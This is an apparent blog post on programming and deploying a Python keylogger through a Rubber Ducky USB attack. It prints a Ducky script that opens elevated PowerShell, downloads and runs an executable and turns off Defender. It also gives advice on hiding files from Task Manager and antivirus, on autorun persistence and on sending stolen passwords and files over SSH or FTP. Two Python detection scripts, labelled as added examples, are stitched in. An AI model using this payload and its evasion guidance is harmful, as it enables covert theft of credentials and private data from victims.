Programming a Keylogger in Python

Written by morpheuslord | Published 2021/06/10

TLDR: A keylogger is a tool designed to record every keystroke on a system for later retrieval. A Python keylogger requires Python to be preinstalled on the victim's system, or you may convert it into a binary so it can be installed on the system anyway. The most basic program can collect only the info typed by the target and deliver it via email or an application. More sophisticated programs can collect typed information, GPS location, IP address, and saved data. You can even make your operation stealthy by placing the programs in a location and hiding the folder using the hide function.

A keylogger is a tool designed to record every keystroke on a system for later retrieval. Its purpose is usually to let the user of the tool gain access to confidential information typed by the target, or typed on the affected computer, such as users' passwords and other private information. Hackers often use viruses, trojans, and rootkit-like methods to remain active and hidden.
The amount of info keylogger software can collect varies with the software used and how complex it is. The most basic program can collect only the info typed by the target and deliver it via email or an application. More sophisticated keylogger software can collect:
  • Typed Information
  • GPS location
  • IP location
  • Saved data
  • FTP and SSH transfer service
  • Download and upload data
In this article, we'll discuss:
  • Programming a keylogger in Python
  • Injecting the script
  • Setting up the autorun feature
  • Selecting the information retrieval method
  • Tools and things required to execute the attack
  • Risk
  • Preventions
  • Courses on Udemy

Program a keylogger in Python

You may need Python and C++, and even some Arduino and Ducky coding engines, to run and execute the code for the keyloggers.
A Python keylogger requires Python to be preinstalled on the victim's system, or you may convert it into a binary so it can be installed on the system anyway. I am going to explain the dynamics but not how to code the entire thing, as even I don't know how to do it; don't judge me. I am going to suggest a few Udemy courses for that; you can check them out if you want to learn how to build a keylogger.

Injecting the script

If you have written the script, converted it to a binary file, and uploaded it to MediaFire, you can download it via code running in the background using a Ducky script. You can also have the code and the script in one single Ducky script that runs in the background of the system, if you code it in such a way that it uses the os function to run the tool in the background.
Using this, you can even make your operation stealthy by placing the programs in a location and hiding the folder using the hide function or header.
Script to download and execute a file from a website and disable Defender using PowerShell:
REM Windows 10: PowerShell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y 
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
exit;
The above image shows the complete map of how the HID attack works in detail.
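For defenders, the payload above leaves recognisable command text behind: an elevated PowerShell launch, a WebClient download followed by a shell execute, and a Defender real-time monitoring shutdown. The following is an added example, not code from the original article, that scans PowerShell command logs for those patterns and correlates them per host; the pipe-separated log format, host names, rule names and the 60-second window are assumptions made for the illustration.

```python
import re
from datetime import datetime, timedelta

# One rule per behaviour visible in the Ducky payload (rule names are hypothetical).
RULES = {
    "elevated_powershell": re.compile(r"Start-Process\s+powershell\b.*-Verb\s+runAs", re.I),
    "webclient_download": re.compile(r"Net\.WebClient.*\.DownloadFile\(", re.I),
    "shell_execute": re.compile(r"shell\.application.*\.shellexecute\(", re.I),
    "defender_rtm_off": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I),
}

# Constructed sample log, assumed format: timestamp|host|user|PowerShell command text
SAMPLE_LOG = """\
2021-06-10T10:00:01|WS-01|alice|powershell Start-Process powershell -Verb runAs
2021-06-10T10:00:03|WS-01|alice|$down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
2021-06-10T10:00:06|WS-01|alice|Set-MpPreference -DisableRealtimeMonitoring $true
2021-06-10T11:30:00|WS-02|bob|Get-MpPreference | Select-Object DisableRealtimeMonitoring
2021-06-10T12:00:00|WS-03|carol|Set-MpPreference -DisableRealtimeMonitoring $false
"""


def scan(log_text):
    """Return one hit per log line that matches at least one rule."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # maxsplit=3 keeps any '|' inside the command text intact
        ts, host, user, cmd = line.split("|", 3)
        matched = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if matched:
            hits.append({"time": datetime.fromisoformat(ts), "host": host,
                         "user": user, "rules": matched})
    return hits


def correlate(hits, window=timedelta(seconds=60)):
    """Hosts where a download and a Defender shutdown occur within `window`."""
    flagged = set()
    for a in hits:
        for b in hits:
            if (a["host"] == b["host"] and "webclient_download" in a["rules"]
                    and "defender_rtm_off" in b["rules"]
                    and abs(b["time"] - a["time"]) <= window):
                flagged.add(a["host"])
    return sorted(flagged)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["time"].isoformat(), h["host"], h["user"], ",".join(h["rules"]))
    print("correlated hosts:", correlate(found))
```

The read-only `Get-MpPreference` query and the `$false` setting in the sample are deliberately left unflagged, so routine administration does not raise the same alert.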

Setting up autorun feature

Using this code, you can add an autorun feature for a file. There is software available that automates the process, but for the best result you can opt for injecting the code inside another program that you know the target often uses. This can be achieved by adding a new icon on the desktop that replaces the already existing icon, or you can build the autorun feature into the source code. You can even make the files stealthy by converting them to binaries and changing the name to another name in the source code itself. This way, you can hide this from the Task Manager and other users, and if you are smart enough you can code it in such a way that the antivirus software does not recognize it as a virus but as a legitimate application.

Setting up the information retrieval mechanism

You can select the retrieval method and the way you want to extract the data from the target. Among the few options are SSH and FTP, and I think SSH is the best because the name itself suggests Secure Shell. It's recommended to keep yourself safe to a certain extent from reverse engineering of the application, but you can also use FTP to just transfer the files and folders to the Raspberry Pi set-up that listens for and captures the incoming data. This type of keylogger is really dangerous, as your data can be transferred in just 1 or 2 hours if the attacker has good internet.
You can imagine it like this:
(Target's view)
  1. I find a dropped pen drive
  2. I connect it to a PC
  3. The PC restarts
  4. I find an app on the pen drive and I run it
  5. Nothing happens
  6. I remove the pen drive
(Hacker's view)
  1. I receive a connection
  2. I download the files I intended to
  3. I install all the malicious files on the target's computer
  4. I sell the files and info on the dark web
Data I can retrieve:
  • login information
  • web data
  • stored passwords
  • wifi passwords
  • system logs
  • web camera clips
  • photos
  • videos
  • downloads list
  • documents
  • and many more

Tools and things required to execute the attack

  1. Rubber Ducky: a Rubber Ducky is a Hak5 tool that automates keystrokes. When the Rubber Ducky is connected to a system, it presents itself as a keyboard and starts to inject commands into the victim's system at superhuman speed in the background. The victim will not even notice; it will be over in a second, and the hacker will receive a reverse connection.
  2. Internet: If you never connect your computer, you are 100 percent safe from hackers on the internet. There is no way someone can hack and retrieve, alter or monitor information without physical access. This, however, is not the only way unconnected computers or smartphones can be accessed or monitored.
  3. Raspberry Pi 4: The Raspberry Pi 4 can do a surprising amount. Amateur tech enthusiasts use Pi boards as media centers, file servers, retro games consoles, routers, and network-level ad-blockers, for starters.
  4. Python and C++ scripting engine: You can use any scripting engine, from Notepad to Visual Studio, for the job.
  5. Ducky and Arduino scripting engine: You can write Ducky scripts in any scripting engine, but Arduino uses the Arduino engine to write Arduino scripts.
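The "superhuman speed" of an injecting keyboard described in item 1 is itself a detection signal. The following is an added example, not code from the original article, that finds runs of keystrokes arriving faster than a person can type; the event format (millisecond timestamp, character) and the thresholds `max_gap_ms` and `min_run` are assumptions to tune against real typing data.

```python
def _summarize(run):
    """Describe one run of fast keystrokes."""
    duration_ms = run[-1][0] - run[0][0]
    rate = (len(run) - 1) * 1000 / duration_ms if duration_ms else float("inf")
    return {"start_ms": run[0][0], "end_ms": run[-1][0], "keys": len(run),
            "keys_per_sec": round(rate, 1),
            "text": "".join(key for _, key in run)}


def find_injection_bursts(events, max_gap_ms=15, min_run=20):
    """Return runs of >= min_run keys whose consecutive gaps are <= max_gap_ms.

    events: list of (timestamp_ms, character) tuples in arrival order.
    """
    bursts, run = [], []
    for ts, key in events:
        # A gap longer than max_gap_ms ends the current run.
        if run and ts - run[-1][0] > max_gap_ms:
            if len(run) >= min_run:
                bursts.append(_summarize(run))
            run = []
        run.append((ts, key))
    if len(run) >= min_run:
        bursts.append(_summarize(run))
    return bursts


def make_events(text, start_ms, gap_ms):
    """Build constructed key events: one character every gap_ms milliseconds."""
    return [(start_ms + i * gap_ms, ch) for i, ch in enumerate(text)]


# Constructed sample: human typing (140-160 ms per key) around one injected line
# typed at 5 ms per key. The injected text is the STRING line from the payload.
INJECTED = "powershell Start-Process powershell -Verb runAs"
SAMPLE_EVENTS = (make_events("hello world", 0, 160)
                 + make_events(INJECTED, 5000, 5)
                 + make_events(" thanks", 9000, 140))


if __name__ == "__main__":
    for burst in find_injection_bursts(SAMPLE_EVENTS):
        print(f"{burst['keys']} keys at {burst['keys_per_sec']}/s "
              f"from {burst['start_ms']} ms: {burst['text']!r}")
```

Each `STRING` line of a Ducky script shows up as its own burst, because the `DELAY` commands between them exceed the gap threshold.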
Hacking is a risky job, and you may end up behind bars for doing things such as hacking IT services. Please do it responsibly by getting permission from the target before doing such a thing.

Written by morpheuslord | I am a red team operator and a security enthusiast. I write blogs and articles related to cyber-sec topics.
Published by HackerNoon on 2021/06/10